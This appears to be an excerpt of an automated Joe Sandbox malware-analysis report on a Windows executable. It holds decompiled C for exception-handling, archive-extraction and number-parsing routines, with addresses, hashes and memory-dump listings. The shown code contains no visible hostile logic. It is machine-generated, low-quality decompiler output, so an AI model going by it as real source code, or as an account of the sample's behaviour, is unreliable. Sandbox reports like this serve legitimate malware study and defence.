				_t281 = _t282 - 0x28;
				_t283 = _t282 - 0x128;
				_t218 =  *0x35c7b008; // 0x861d85c91f07
				_t219 = _t218 ^ _t283;
				 *(_t281 + 0x10) = _t219;
				_t279 =  *((intOrPtr*)(_t281 + 0x90));
				_t304 =  *((intOrPtr*)(_t281 + 0xa8));
				 *((long long*)(_t283 + 0x68)) = __r8;
				_t235 = __rcx;
				 *((long long*)(_t281 - 0x80)) = __rdx;
				 *(_t281 - 0x68) = _t304;
				 *((char*)(_t283 + 0x60)) = 0;
				_t280 = __r9;
				_t127 = E00007FF77FF735C4DE68(__ecx, __rcx, __rdx, __r9, __r9, _t281, _t279, __r9);
				r14d = _t127;
				if (_t127 - 0xffffffff < 0) goto 0x35c4d3e7;
				if (_t127 - _t279[1] >= 0) goto 0x35c4d3e7;
				if ( *_t235 != 0xe06d7363) goto 0x35c4d073;
				if ( *((intOrPtr*)(_t235 + 0x18)) != 4) goto 0x35c4d073;
				if ( *((intOrPtr*)(_t235 + 0x20)) - 0x19930520 - 2 > 0) goto 0x35c4d073;
				if ( *((long long*)(_t235 + 0x30)) != 0) goto 0x35c4d073;
				E00007FF77FF735C4C03C(_t219);
				if ( *((long long*)(_t219 + 0x20)) == 0) goto 0x35c4d380;
				E00007FF77FF735C4C03C(_t219);
				_t236 =  *((intOrPtr*)(_t219 + 0x20));
				E00007FF77FF735C4C03C(_t219);
				 *((char*)(_t283 + 0x60)) = 1;
				 *((long long*)(_t283 + 0x68)) =  *((intOrPtr*)(_t219 + 0x28));
				E00007FF77FF735C4C9E8(_t219,  *((intOrPtr*)(_t236 + 0x38)));
				if ( *_t236 != 0xe06d7363) goto 0x35c4d02b;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x35c4d02b;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x35c4d02b;
				if ( *((long long*)(_t236 + 0x30)) == 0) goto 0x35c4d3e7;
				E00007FF77FF735C4C03C(_t219);
				if ( *(_t219 + 0x38) == 0) goto 0x35c4d073;
				E00007FF77FF735C4C03C(_t219);
				E00007FF77FF735C4C03C(_t219);
				 *(_t219 + 0x38) =  *(_t219 + 0x38) & 0x00000000;
				if (E00007FF77FF735C4DF00(_t219, _t236, _t236,  *(_t219 + 0x38), __r9) != 0) goto 0x35c4d06e;
				if (E00007FF77FF735C4DFF0(_t219, _t236,  *(_t219 + 0x38), __r9, _t281) == 0) goto 0x35c4d3c4;
				goto 0x35c4d3a0;
				 *((long long*)(_t281 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t281 - 0x48) = _t279;
				if ( *_t236 != 0xe06d7363) goto 0x35c4d337;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x35c4d337;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x35c4d337;
				r13d = 0;
				if (_t279[3] - r13d <= 0) goto 0x35c4d268;
				 *(_t283 + 0x28) =  *(_t281 + 0xa0);
				 *(_t283 + 0x20) = _t279;
				r8d = r14d;
				_t144 = E00007FF77FF735C4C6D4(_t236, _t281 - 0x28, _t281 - 0x48, __r9, _t281, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t144 -  *((intOrPtr*)(_t281 - 0x10)) >= 0) goto 0x35c4d268;
				_t295 =  *((intOrPtr*)(_t281 - 0x28));
				r12d =  *((intOrPtr*)(_t281 - 0x30));
				 *((long long*)(_t283 + 0x78)) = _t295;
				_t145 = r12d;
				asm("inc ecx");
				 *((intOrPtr*)(_t281 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t145 - r14d > 0) goto 0x35c4d257;
				_t225 =  *(_t281 - 0x60) >> 0x20;
				if (r14d - _t145 > 0) goto 0x35c4d257;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t281 - 0x38)) + 0x10)) + ( *( *(_t281 - 0x38)) +  *( *(_t281 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t295 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				 *((long long*)(_t281 - 0x70)) = _t266;
				if (r15d == 0) goto 0x35c4d254;
				_t245 = _t225 + _t225 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t245 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t281 + 8)) =  *((intOrPtr*)(_t266 + _t59 + 0x10));
				E00007FF77FF735C4C9BC(_t225);
				_t227 = _t225 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc));
				 *((long long*)(_t283 + 0x70)) = _t227;
				E00007FF77FF735C4C9BC(_t227);
				_t175 =  *((intOrPtr*)(_t227 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t283 + 0x64)) = _t175;
				if (_t175 <= 0) goto 0x35c4d1e5;
				E00007FF77FF735C4C9BC(_t227);
				 *((long long*)(_t281 - 0x78)) = _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70))));
				if (E00007FF77FF735C4D608(_t179, _t236, _t281 - 8, _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70)))), _t279, __r9,  *((intOrPtr*)(_t236 + 0x30))) != 0) goto 0x35c4d1f6;
				 *((long long*)(_t283 + 0x70)) =  *((long long*)(_t283 + 0x70)) + 4;
				_t153 =  *((intOrPtr*)(_t283 + 0x64)) - 1;
				 *((intOrPtr*)(_t283 + 0x64)) = _t153;
				if (_t153 > 0) goto 0x35c4d1a9;
				r13d = r13d + 1;
				if (r13d == r15d) goto 0x35c4d24f;
				goto 0x35c4d162;
				 *((char*)(_t283 + 0x58)) =  *((intOrPtr*)(_t281 + 0x98));
				 *(_t283 + 0x50) =  *((intOrPtr*)(_t283 + 0x60));
				 *((long long*)(_t283 + 0x48)) =  *(_t281 - 0x68);
				 *(_t283 + 0x40) =  *(_t281 + 0xa0);
				 *(_t283 + 0x38) = _t281 - 0x60;
				 *(_t283 + 0x30) =  *((intOrPtr*)(_t281 - 0x78));
				 *(_t283 + 0x28) = _t281 - 8;
				 *(_t283 + 0x20) = _t279;
				E00007FF77FF735C4CE54(_t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *((intOrPtr*)(_t283 + 0x68)), _t280);
				r13d = 0;
				r12d = r12d + 1;
				if (r12d -  *((intOrPtr*)(_t281 - 0x10)) < 0) goto 0x35c4d0fd;
				if (( *_t279 & 0x1fffffff) - 0x19930521 < 0) goto 0x35c4d374;
				_t208 = _t279[8] - r13d;
				if (_t208 == 0) goto 0x35c4d28e;
				E00007FF77FF735C4C9A8(_t281 - 8);
				if (_t208 != 0) goto 0x35c4d2af;
				if ((_t279[9] >> 0x00000002 & 0x00000001) == 0) goto 0x35c4d374;
				if (E00007FF77FF735C4C578(_t279[9] >> 0x00000002 & 0x00000001, _t281 - 8 + _t279[8], _t280, _t279) != 0) goto 0x35c4d374;
				if ((_t279[9] >> 0x00000002 & 0x00000001) != 0) goto 0x35c4d3ca;
				if (_t279[8] == r13d) goto 0x35c4d2d4;
				E00007FF77FF735C4C9A8(_t281 - 8 + _t279[8]);
				_t234 = _t279[8];
				goto 0x35c4d2d7;
				if (E00007FF77FF735C4DF00(_t234, _t236, _t236, _t304, _t280) != 0) goto 0x35c4d374;
				E00007FF77FF735C4C608(_t236,  *((intOrPtr*)(_t281 - 0x80)), _t280, _t281, _t279, _t281 - 0x78);
				_t176 =  *((intOrPtr*)(_t281 + 0x98));
				 *(_t283 + 0x50) = _t176;
				_t177 = _t176 | 0xffffffff;
				 *((long long*)(_t283 + 0x48)) = _t280;
				 *(_t283 + 0x40) = _t304;
				 *(_t283 + 0x38) = _t177;
				 *(_t283 + 0x30) = _t177;
				 *(_t283 + 0x28) = _t279;
				 *(_t283 + 0x20) = _t304;
				E00007FF77FF735C4C814( *((intOrPtr*)(_t281 - 0x80)), _t236,  *((intOrPtr*)(_t283 + 0x68)), _t234);
				goto 0x35c4d374;
				if (_t279[3] <= 0) goto 0x35c4d374;
				if ( *((char*)(_t281 + 0x98)) != 0) goto 0x35c4d3e7;
				 *(_t283 + 0x38) = _t304;
				 *(_t283 + 0x30) =  *(_t281 + 0xa0);
				 *(_t283 + 0x28) = r14d;
				 *(_t283 + 0x20) = _t279;
				E00007FF77FF735C4D3F0(_t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *(_t281 - 0x58) >> 0x20, _t280);
				_t172 = E00007FF77FF735C4C03C(_t234);
				if ( *((long long*)(_t234 + 0x38)) != 0) goto 0x35c4d3e7;
				return E00007FF77FF735C4A410(_t172, _t177,  *(_t281 + 0x10) ^ _t283);
			}

































                                                                                                                                                                                                                              0x7ff735c4cf35
                                                                                                                                                                                                                              0x7ff735c4cf3a
                                                                                                                                                                                                                              0x7ff735c4cf41
                                                                                                                                                                                                                              0x7ff735c4cf48
                                                                                                                                                                                                                              0x7ff735c4cf4b
                                                                                                                                                                                                                              0x7ff735c4cf4f
                                                                                                                                                                                                                              0x7ff735c4cf59
                                                                                                                                                                                                                              0x7ff735c4cf63
                                                                                                                                                                                                                              0x7ff735c4cf68
                                                                                                                                                                                                                              0x7ff735c4cf6b
                                                                                                                                                                                                                              0x7ff735c4cf75
                                                                                                                                                                                                                              0x7ff735c4cf7c
                                                                                                                                                                                                                              0x7ff735c4cf81
                                                                                                                                                                                                                              0x7ff735c4cf84
                                                                                                                                                                                                                              0x7ff735c4cf89
                                                                                                                                                                                                                              0x7ff735c4cf8f
                                                                                                                                                                                                                              0x7ff735c4cf98
                                                                                                                                                                                                                              0x7ff735c4cfa4
                                                                                                                                                                                                                              0x7ff735c4cfae
                                                                                                                                                                                                                              0x7ff735c4cfbf
                                                                                                                                                                                                                              0x7ff735c4cfca
                                                                                                                                                                                                                              0x7ff735c4cfd0
                                                                                                                                                                                                                              0x7ff735c4cfda
                                                                                                                                                                                                                              0x7ff735c4cfe0
                                                                                                                                                                                                                              0x7ff735c4cfe5
                                                                                                                                                                                                                              0x7ff735c4cfe9
                                                                                                                                                                                                                              0x7ff735c4cff2
                                                                                                                                                                                                                              0x7ff735c4cffb
                                                                                                                                                                                                                              0x7ff735c4d000
                                                                                                                                                                                                                              0x7ff735c4d00b
                                                                                                                                                                                                                              0x7ff735c4d011
                                                                                                                                                                                                                              0x7ff735c4d01e
                                                                                                                                                                                                                              0x7ff735c4d025
                                                                                                                                                                                                                              0x7ff735c4d02b
                                                                                                                                                                                                                              0x7ff735c4d035
                                                                                                                                                                                                                              0x7ff735c4d037
                                                                                                                                                                                                                              0x7ff735c4d040
                                                                                                                                                                                                                              0x7ff735c4d04b
                                                                                                                                                                                                                              0x7ff735c4d057
                                                                                                                                                                                                                              0x7ff735c4d063
                                                                                                                                                                                                                              0x7ff735c4d069
                                                                                                                                                                                                                              0x7ff735c4d077
                                                                                                                                                                                                                              0x7ff735c4d07b
                                                                                                                                                                                                                              0x7ff735c4d085
                                                                                                                                                                                                                              0x7ff735c4d08f
                                                                                                                                                                                                                              0x7ff735c4d0a0
                                                                                                                                                                                                                              0x7ff735c4d0a6
                                                                                                                                                                                                                              0x7ff735c4d0ad
                                                                                                                                                                                                                              0x7ff735c4d0bd
                                                                                                                                                                                                                              0x7ff735c4d0c8
                                                                                                                                                                                                                              0x7ff735c4d0cd
                                                                                                                                                                                                                              0x7ff735c4d0d0
                                                                                                                                                                                                                              0x7ff735c4d0d5
                                                                                                                                                                                                                              0x7ff735c4d0d9
                                                                                                                                                                                                                              0x7ff735c4d0de
                                                                                                                                                                                                                              0x7ff735c4d0e3
                                                                                                                                                                                                                              0x7ff735c4d0ea
                                                                                                                                                                                                                              0x7ff735c4d0f0
                                                                                                                                                                                                                              0x7ff735c4d0f4
                                                                                                                                                                                                                              0x7ff735c4d0f8
                                                                                                                                                                                                                              0x7ff735c4d108
                                                                                                                                                                                                                              0x7ff735c4d117
                                                                                                                                                                                                                              0x7ff735c4d121
                                                                                                                                                                                                                              0x7ff735c4d124
                                                                                                                                                                                                                              0x7ff735c4d128
                                                                                                                                                                                                                              0x7ff735c4d12f
                                                                                                                                                                                                                              0x7ff735c4d139
                                                                                                                                                                                                                              0x7ff735c4d140
                                                                                                                                                                                                                              0x7ff735c4d14d
                                                                                                                                                                                                                              0x7ff735c4d155
                                                                                                                                                                                                                              0x7ff735c4d15c
                                                                                                                                                                                                                              0x7ff735c4d165
                                                                                                                                                                                                                              0x7ff735c4d169
                                                                                                                                                                                                                              0x7ff735c4d16d
                                                                                                                                                                                                                              0x7ff735c4d171
                                                                                                                                                                                                                              0x7ff735c4d175
                                                                                                                                                                                                                              0x7ff735c4d178
                                                                                                                                                                                                                              0x7ff735c4d189
                                                                                                                                                                                                                              0x7ff735c4d18c
                                                                                                                                                                                                                              0x7ff735c4d191
                                                                                                                                                                                                                              0x7ff735c4d19e
                                                                                                                                                                                                                              0x7ff735c4d1a1
                                                                                                                                                                                                                              0x7ff735c4d1a7
                                                                                                                                                                                                                              0x7ff735c4d1a9
                                                                                                                                                                                                                              0x7ff735c4d1c4
                                                                                                                                                                                                                              0x7ff735c4d1cf
                                                                                                                                                                                                                              0x7ff735c4d1d5
                                                                                                                                                                                                                              0x7ff735c4d1db
                                                                                                                                                                                                                              0x7ff735c4d1dd
                                                                                                                                                                                                                              0x7ff735c4d1e3
                                                                                                                                                                                                                              0x7ff735c4d1e5
                                                                                                                                                                                                                              0x7ff735c4d1eb
                                                                                                                                                                                                                              0x7ff735c4d1f1
                                                                                                                                                                                                                              0x7ff735c4d20b
                                                                                                                                                                                                                              0x7ff735c4d213
                                                                                                                                                                                                                              0x7ff735c4d21b
                                                                                                                                                                                                                              0x7ff735c4d226
                                                                                                                                                                                                                              0x7ff735c4d22e
                                                                                                                                                                                                                              0x7ff735c4d237
                                                                                                                                                                                                                              0x7ff735c4d240
                                                                                                                                                                                                                              0x7ff735c4d245
                                                                                                                                                                                                                              0x7ff735c4d24a
                                                                                                                                                                                                                              0x7ff735c4d254
                                                                                                                                                                                                                              0x7ff735c4d257
                                                                                                                                                                                                                              0x7ff735c4d25e
                                                                                                                                                                                                                              0x7ff735c4d274
                                                                                                                                                                                                                              0x7ff735c4d27a
                                                                                                                                                                                                                              0x7ff735c4d27e
                                                                                                                                                                                                                              0x7ff735c4d280
                                                                                                                                                                                                                              0x7ff735c4d28c
                                                                                                                                                                                                                              0x7ff735c4d296
                                                                                                                                                                                                                              0x7ff735c4d2a9
                                                                                                                                                                                                                              0x7ff735c4d2b7
                                                                                                                                                                                                                              0x7ff735c4d2c1
                                                                                                                                                                                                                              0x7ff735c4d2c3
                                                                                                                                                                                                                              0x7ff735c4d2cb
                                                                                                                                                                                                                              0x7ff735c4d2d2
                                                                                                                                                                                                                              0x7ff735c4d2e1
                                                                                                                                                                                                                              0x7ff735c4d2f4
                                                                                                                                                                                                                              0x7ff735c4d2f9
                                                                                                                                                                                                                              0x7ff735c4d30a
                                                                                                                                                                                                                              0x7ff735c4d30e
                                                                                                                                                                                                                              0x7ff735c4d311
                                                                                                                                                                                                                              0x7ff735c4d316
                                                                                                                                                                                                                              0x7ff735c4d31b
                                                                                                                                                                                                                              0x7ff735c4d31f
                                                                                                                                                                                                                              0x7ff735c4d326
                                                                                                                                                                                                                              0x7ff735c4d32b
                                                                                                                                                                                                                              0x7ff735c4d330
                                                                                                                                                                                                                              0x7ff735c4d335
                                                                                                                                                                                                                              0x7ff735c4d33b
                                                                                                                                                                                                                              0x7ff735c4d344
                                                                                                                                                                                                                              0x7ff735c4d353
                                                                                                                                                                                                                              0x7ff735c4d35b
                                                                                                                                                                                                                              0x7ff735c4d362
                                                                                                                                                                                                                              0x7ff735c4d36a
                                                                                                                                                                                                                              0x7ff735c4d36f
                                                                                                                                                                                                                              0x7ff735c4d374
                                                                                                                                                                                                                              0x7ff735c4d37e
                                                                                                                                                                                                                              0x7ff735c4d39f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 3606184308-393685449
                                                                                                                                                                                                                              • Opcode ID: 25ee95a25496e06845bb15798435b7fd8cb43ceb415666231cea0fbcb9b936c8
                                                                                                                                                                                                                              • Instruction ID: 9387b864b42759c046aa6012da046f9241c50f5b260ba890b824c2c20e2e9dc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25ee95a25496e06845bb15798435b7fd8cb43ceb415666231cea0fbcb9b936c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FD1C0B3A087539AEB21BB6590506ADB7A1FB45B8CF820135EE4D47B99CF38E481D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C412B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                                                                                              			E00007FF77FF735C412B0(long long* __rcx, void* __rdx) {
				long long _t8;
				void* _t15;
				void* _t16;
				void* _t17;

				_t8 =  *((intOrPtr*)(__rcx));
				_t15 = __rdx;
				if (_t8 != 0) goto 0x35c412f8;
				E00007FF77FF735C43B00(_t8, __rcx + 0x78, "rb");
				 *__rcx = _t8;
				if (_t8 != 0) goto 0x35c412f8;
				E00007FF77FF735C42820(_t8, "Failed to extract %s: failed to open archive file!\n", _t15 + 0x12, _t16, _t17);
				return 0;
			}







                                                                                                                                                                                                                              0x7ff735c412b8
                                                                                                                                                                                                                              0x7ff735c412bb
                                                                                                                                                                                                                              0x7ff735c412c4
                                                                                                                                                                                                                              0x7ff735c412d1
                                                                                                                                                                                                                              0x7ff735c412d6
                                                                                                                                                                                                                              0x7ff735c412dc
                                                                                                                                                                                                                              0x7ff735c412e9
                                                                                                                                                                                                                              0x7ff735c412f7

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                              • Opcode ID: 58ac307bfd520e97fba93c03d2ea1b37497b22b05f8ff59d5415797d190f6d56
                                                                                                                                                                                                                              • Instruction ID: 262bc483ba2dad3c601bacedb0e101a4501ee887b3c497d867ef4b05456ba4ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ac307bfd520e97fba93c03d2ea1b37497b22b05f8ff59d5415797d190f6d56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B4187A3B0869391EE11FB12E410AB9E362EF44F98FC45531DA8D47A55EE7CE541E310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C588C4 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 489COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                                                                                              			E00007FF77FF735C588C4(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t156;
				void* _t186;
				signed short _t200;
				signed short _t201;
				signed int _t202;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				signed short* _t381;
				signed short* _t382;
				signed short* _t383;
				signed short* _t385;
				signed short** _t386;
				long long _t387;
				long long* _t390;
				signed short* _t391;
				long long* _t395;
				long long* _t396;
				long long* _t397;
				signed short** _t398;
				void* _t399;
				void* _t400;
				signed short* _t405;
				signed short* _t406;
				long long _t407;
				signed short* _t408;
				long long _t409;
				intOrPtr _t410;

				_t404 = __r8;
				_t395 = __rdx;
				_t387 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t407 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t256 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t407;
				_t398 = __rdx;
				if (_t407 != 0) goto 0x35c5890f;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c58941;
				if (r14d == 0) goto 0x35c58959;
				_t4 = _t404 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0x35c58959;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t409;
				E00007FF77FF735C59330(__rax, __rbx, __rcx, __rdx, _t399, _t400, __r8);
				_t390 = _t398[1];
				if (_t390 == 0) goto 0x35c58fa5;
				 *_t390 =  *_t398;
				goto 0x35c58fa5;
				_t10 = _t407 + 2; // 0x2
				 *_t395 = _t10;
				_t261 = r13d;
				if ( *((intOrPtr*)(_t390 + 0x28)) != r13b) goto 0x35c58983;
				E00007FF77FF735C53100(_t10, _t387, _t390, _t399);
				goto 0x35c58983;
				_t379 =  *_t398;
				 *_t398 =  &(( *_t398)[1]);
				if (E00007FF77FF735C61C68( *_t379 & 0xffff, 8, _t387, _t390) != 0) goto 0x35c58976;
				_t258 =  !=  ? _t256 : _t256 | 0x00000002;
				_t12 = _t387 - 0x2b; // -43
				if ((0x0000fffd & _t12) != 0) goto 0x35c589ba;
				_t381 =  *_t398;
				_t200 =  *_t381 & 0x0000ffff;
				_t382 =  &(_t381[1]);
				 *_t398 = _t382;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t382 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x35c58d28;
				if (_t200 - 0x30 < 0) goto 0x35c58c77;
				if (_t200 - 0x3a >= 0) goto 0x35c58ac6;
				goto 0x35c58c72;
				if (_t200 - 0xff10 >= 0) goto 0x35c58c63;
				if (_t200 - r8w < 0) goto 0x35c58c77;
				if (_t200 - 0x66a >= 0) goto 0x35c58aee;
				goto 0x35c58c72;
				if (_t200 - r10w < 0) goto 0x35c58c77;
				if (_t200 - 0x6fa >= 0) goto 0x35c58b0d;
				goto 0x35c58c72;
				if (_t200 - r11w < 0) goto 0x35c58c77;
				if (_t200 - 0x970 >= 0) goto 0x35c58b2c;
				goto 0x35c58c72;
				if (_t200 - r9w < 0) goto 0x35c58c77;
				if (_t200 - 0x9f0 >= 0) goto 0x35c58b4b;
				goto 0x35c58c72;
				if (_t200 - (_t200 & 0x0000ffff) - r9d < 0) goto 0x35c58c77;
				if (_t200 - _a16 >= 0) goto 0x35c58b6b;
				goto 0x35c58c72;
				if (_t200 - _v152 < 0) goto 0x35c58c77;
				if (_t200 - _v148 < 0) goto 0x35c58abc;
				if (_t200 - _v144 < 0) goto 0x35c58c77;
				if (_t200 - _v140 < 0) goto 0x35c58abc;
				if (_t200 - _v136 < 0) goto 0x35c58c77;
				if (_t200 - _v132 < 0) goto 0x35c58abc;
				if (_t200 - _v128 < 0) goto 0x35c58c77;
				if (_t200 - _v124 < 0) goto 0x35c58abc;
				if (_t200 - _v120 < 0) goto 0x35c58c77;
				if (_t200 - _v116 < 0) goto 0x35c58abc;
				if (_t200 - _v112 < 0) goto 0x35c58c77;
				if (_t200 - _v108 < 0) goto 0x35c58abc;
				if (_t200 - _v104 < 0) goto 0x35c58c77;
				if (_t200 - _v100 < 0) goto 0x35c58abc;
				if (_t200 - _v96 < 0) goto 0x35c58c77;
				if (_t200 - _v92 < 0) goto 0x35c58abc;
				if (_t200 - _v88 < 0) goto 0x35c58c77;
				if (_t200 - _v84 < 0) goto 0x35c58abc;
				if (_t200 - _v80 < 0) goto 0x35c58c77;
				if (_t200 - _v76 < 0) goto 0x35c58abc;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x35c58c77;
				goto 0x35c58abc;
				if (_t200 - _v68 >= 0) goto 0x35c58c77;
				if ((_t200 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x35c58c99;
				_t64 = _t390 - 0x41; // -17
				_t65 = _t390 - 0x61; // -49
				_t156 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x35c58c8e;
				if (_t156 - 0x19 > 0) goto 0x35c58d19;
				if (_t156 - 0x19 > 0) goto 0x35c58c96;
				_t66 = _t390 - 0x37; // -231
				if (_t66 != 0) goto 0x35c58d19;
				_t391 =  *_t398;
				r9d = 0xffdf;
				_t251 =  *_t391 & 0x0000ffff;
				_t67 =  &(_t391[1]); // 0xffe1
				_t405 = _t67;
				 *_t398 = _t405;
				_t68 = _t395 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x35c58d01;
				 *_t398 = _t391;
				_t160 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t251 == 0) goto 0x35c58cf9;
				if ( *_t391 == _t251) goto 0x35c58cf9;
				E00007FF77FF735C53B18(_t382);
				 *_t382 = 0x16;
				E00007FF77FF735C59400();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x35c58d28;
				r8d = 0x660;
				goto 0x35c58d28;
				_t201 =  *_t405 & 0x0000ffff;
				_t71 =  &(_t405[1]); // 0xffe3
				_t383 = _t71;
				 *_t398 = _t383;
				r8d = 0x660;
				goto 0x35c58d1e;
				_t165 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t166 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
